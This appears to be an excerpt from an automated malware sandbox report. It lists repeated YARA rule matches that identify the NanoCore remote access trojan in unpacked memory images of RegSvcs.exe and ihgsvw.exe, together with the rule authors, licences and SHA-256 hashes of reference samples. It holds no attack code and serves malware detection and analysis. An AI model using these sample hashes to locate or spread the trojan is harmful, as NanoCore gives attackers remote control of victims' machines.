Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
